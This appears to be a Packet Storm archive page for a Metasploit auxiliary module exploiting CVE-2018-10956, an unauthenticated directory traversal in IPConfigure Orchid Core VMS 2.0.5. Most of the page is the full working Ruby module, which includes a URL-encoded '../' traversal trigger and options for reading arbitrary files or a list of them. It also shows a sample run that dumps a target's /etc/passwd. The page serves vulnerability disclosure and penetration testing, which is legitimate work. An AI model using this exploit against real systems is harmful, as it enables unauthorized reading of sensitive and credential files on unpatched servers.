Twenty Year Anniversary

IPConfigure Orchid VMS 2.0.5 Directory Traversal / Information Disclosure

IPConfigure Orchid VMS 2.0.5 Directory Traversal / Information Disclosure
Posted Jun 21, 2018
Authored by Sanjiv Kawa | Site metasploit.com

Orchid Core VMS is vulnerable to a directory traversal attack. This affects Linux and Windows operating systems. This allows a remote, unauthenticated attacker to send crafted GET requests to the application, which results in the ability to read arbitrary files outside of the applications web directory. This issue is further compounded as the Linux version of Orchid Core VMS application is running in context of a user in the sudoers group. As such, any file on the underlying system, for which the location is known, can be read. This Metasploit module was tested against 2.0.5. This has been fixed in 2.0.6.

tags | exploit, remote, web, arbitrary, file inclusion
systems | linux, windows
advisories | CVE-2018-10956
MD5 | 3e04a3dc073e0a19729151e34ab842cb

IPConfigure Orchid VMS 2.0.5 Directory Traversal / Information Disclosure

Change Mirror Download
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'IPConfigure Orchid VMS <=2.0.5 Directory Traversal Information Disclosure',
'Description' => %q{
Orchid Core VMS is vulnerable to a directory traversal attack. This affects Linux and Windows operating systems. This allows a remote, unauthenticated attacker to send crafted GET requests to the application, which results in the ability to read arbitrary files outside of the applications web directory. This issue is further compounded as the Linux version of Orchid Core VMS application is running in context of a user in the sudoers group. As such, any file on the underlying system, for which the location is known, can be read.

This module was tested against 2.0.5. This has been fixed in 2.0.6.
},
'Author' => [ 'Sanjiv Kawa @kawabungah' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2018-10956' ],
[ 'URL', 'https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/' ],
[ 'URL', 'http://ipconfigure.com/products/orchid-archives' ]
],
'DisclosureDate' => 'May 7, 2018'))

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Orchid VMS', '/']),
OptString.new('FILE', [ true, 'This is the file to download', '/etc/passwd']),
OptString.new('INPUTFILE', [ false, 'Specify a list of files to download']),
Opt::RPORT(80)
], self.class )
end

def init_request(path)
res = send_request_cgi({
'method' => 'GET',
'uri' => path
})

return res
end

def run
path = normalize_uri(target_uri.path)
res = init_request(path)

if res && res.code == 200
file = Array.new
trigger = "%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F"


if datastore['INPUTFILE'].nil? || datastore['INPUTFILE'].empty?
file = [datastore['FILE']]
else
file = File.open([datastore['INPUTFILE']].join(', ').to_s).readlines
end

for i in 0 .. file.length - 1
path = normalize_uri(target_uri.path) + trigger + file[i]
res = init_request(path)

if res.code == 200
print_good("Obtained #{datastore['FILE']}")
puts res.body
puts ""
else
print_error("#{datastore['FILE']} does not exist")
puts res.body
puts ""
end
end
else
print_error("Web Server is Unresponsive")
end
end
end
__END__
msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > show options

Module options (auxiliary/scanner/http/orchid_core_vms_directory_traversal):

Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/passwd yes This is the file to download
INPUTFILE no Specify a list of files to downloads
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.100.100.100 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to Orchid VMS
VHOST no HTTP server virtual host

msf auxiliary(scanner/http/orchid_core_vms_directory_traversal) > run

[+] Obtained /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    29 Files
  • 14
    Nov 14th
    23 Files
  • 15
    Nov 15th
    45 Files
  • 16
    Nov 16th
    11 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close